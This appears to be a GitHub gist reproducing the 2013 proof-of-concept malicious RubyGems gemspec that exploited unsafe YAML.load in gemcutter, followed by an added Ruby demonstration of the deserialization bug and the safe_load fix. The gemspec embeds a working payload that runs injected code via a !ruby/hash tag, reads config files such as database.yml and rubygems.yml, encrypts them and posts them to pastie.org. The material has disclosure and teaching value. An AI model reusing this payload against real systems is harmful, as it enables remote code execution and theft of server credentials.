@titanous
Last active December 11, 2015 23:08
# context: https://news.ycombinator.com/item?id=5139720
--- !ruby/object:Gem::Specification
name: exploit
version: !ruby/object:Gem::Version
version: 22.31.31
prerelease:
platform: ruby
authors:
- Hacker
autorequire:
bindir: bin
cert_chain: []
date: 2013-01-30 00:00:00.000000000 Z
dependencies: []
description: ! 'A Proof-of-Concept PoC gem that exploits a vulnerability in the Psych
YAML
parser, which allows the #[]= method to be called on arbitrary Objects.
If the #[]= method later calls eval() with the given arguments, this allows for
arbitrary execution of code.'
email: support@rubygems.org
executables: []
extensions: []
extra_rdoc_files: []
files:
- gemcutter_rce
homepage: http://rubygems.org/
licenses: []
post_install_message:
rdoc_options: []
require_paths:
- lib
required_ruby_version: !ruby/object:Gem::Requirement
none: false
requirements:
- - ! '>='
- !ruby/object:Gem::Version
version: '0'
required_rubygems_version: !ruby/object:Gem::Requirement
none: false
requirements:
- - ! '>='
- !ruby/object:Gem::Version
version: '0'
requirements: []
rubyforge_project:
rubygems_version: 1.8.24
signing_key:
specification_version: 3
summary: PoC malicious gem that exploits YAML.load in gemcutter
test_files: []
exploit: !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
? ! "foo\n(require 'net/http'\nrequire 'digest'\nrequire 'openssl'\nrequire 'base64'\n\naes
= proc { |text|\n # sourzed from MetaSploit, best pwning t00l ev4r!\n aes_256
= OpenSSL::Cipher.new('aes-256-cbc')\n aes_256.encrypt\n aes_256.key = Digest::MD5.hexdigest(`uname
-r`)\n\n crypted = aes_256.update(text)\n crypted << aes_256.final\n\n Base64.encode64(crypted)\n}\n\nexfil
= proc { |path|\n if File.file?(path) == true\n \"::: #{path} :::\\n\\n#{File.read(path)}\"\n
\ end\n}\n\nloot = [\"config/database.yml\", \"config/librato.yml\", \"config/newrelic.yml\",
\"config/rubygems.yml\"].map { |path| exfil.call(path) }.join\n\nif !(loot.empty?)\nNet::HTTP.post_form(URI('http://pastie.org/pastes'),
{\n 'paste[authorization]' => 'burger',\n 'paste[access_key]' => '',\n 'paste[parse_id]'
\ => '6',\n 'paste[body]' => \"e193256c9337b50b197f040e762dafcc745a66297c9db47ac30395d8022f94a8\\n\\n#{aes.call(loot)}\",\n
\ 'paste[restricted]' => '0',\n 'commit' => 'Create Paste'\n})\nend;
@executed = true) unless @executed\n__END__\n"
: !ruby/object:OpenStruct
table:
:defaults:
:action: create
:controller: foos
:required_parts: []
:requirements:
:action: create
:controller: foos
:segment_keys:
- :format
modifiable: true
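The mechanism the gemspec above relies on, as an added example that is not code from the gist, from rubygems.org or from Rails: a `!ruby/hash:ClassName` tag makes Psych allocate `ClassName` without calling `initialize` and then call its `[]=` for every key/value pair in the mapping. `NamedRoutes` below is a hypothetical stand-in for the route collection named in the exploit's tag; its `[]=` splices the key into Ruby source and evaluates it, which is the pattern the gist's description says the real target had. The payload document, the `EXECUTED` marker and the `unsafe_load`/`run_poc`/`safe_load_rejects?` helpers are constructed for this demonstration; the key uses `foo; end` to close the generated method early and inject a statement, instead of the `__END__` truncation the gist uses.

```ruby
require 'yaml'

# Hypothetical stand-in for a named-route collection (not the real Rails
# class): its []= builds a helper method by interpolating the route name
# into source code that is then evaluated.
class NamedRoutes
  EXECUTED = []   # records whether injected code ran (demonstration only)

  def []=(name, path)
    # Vulnerable pattern: `name` is assumed to be a plain identifier but is
    # interpolated into source code unescaped, so a key containing newlines
    # can end the method definition early and run arbitrary statements.
    self.class.class_eval <<~RUBY
      def #{name}_path(*args)
        #{path.to_s.inspect}
      end
    RUBY
  end
end

# Constructed payload in the same shape as the gist's `exploit:` entry: a
# !ruby/hash tag naming a class that is not a Hash, with an explicit (`?`)
# key whose text breaks out of the generated `def`.
PAYLOAD = <<~'YAML'
  --- !ruby/hash:NamedRoutes
  ? "foo; end\nNamedRoutes::EXECUTED << :payload_ran\ndef dummy"
  : "/never/used"
YAML

# Psych 4 (Ruby 3.1+) made YAML.load safe by default and moved the old
# behaviour to YAML.unsafe_load; older Psych only has YAML.load, which was
# the unsafe one. Pick whichever gives the 2013-era behaviour.
def unsafe_load(doc)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(doc) : YAML.load(doc)
end

# Load the payload the way gemcutter's YAML.load did and report what happened:
# Psych returns a NamedRoutes instance, and []= has already run the injected
# statement and defined the attacker-chosen helper method.
def run_poc
  NamedRoutes::EXECUTED.clear
  obj = unsafe_load(PAYLOAD)
  {
    loaded_class:   obj.class,
    executed:       NamedRoutes::EXECUTED.dup,
    helper_defined: NamedRoutes.method_defined?(:dummy_path)
  }
end

# The fix on the loading side: safe_load resolves tags through a restricted
# class loader and raises before any NamedRoutes object exists, so []= is
# never reached.
def safe_load_rejects?(doc)
  YAML.safe_load(doc)
  false
rescue Psych::DisallowedClass
  true
end

if __FILE__ == $0
  result = run_poc
  puts "loaded #{result[:loaded_class]}, injected code ran: #{result[:executed].inspect}"
  puts "safe_load rejects payload: #{safe_load_rejects?(PAYLOAD)}"
end
```

The same check applies to any object-instantiating tag (`!ruby/object:`, `!ruby/struct:`, `!ruby/hash-with-ivars:`): what matters is not the class named in the document but whether the loader will resolve arbitrary class names at all, so untrusted YAML such as an uploaded gemspec has to go through `safe_load` (or an explicit `permitted_classes` list), never `load` on Psych 3 or `unsafe_load` on Psych 4.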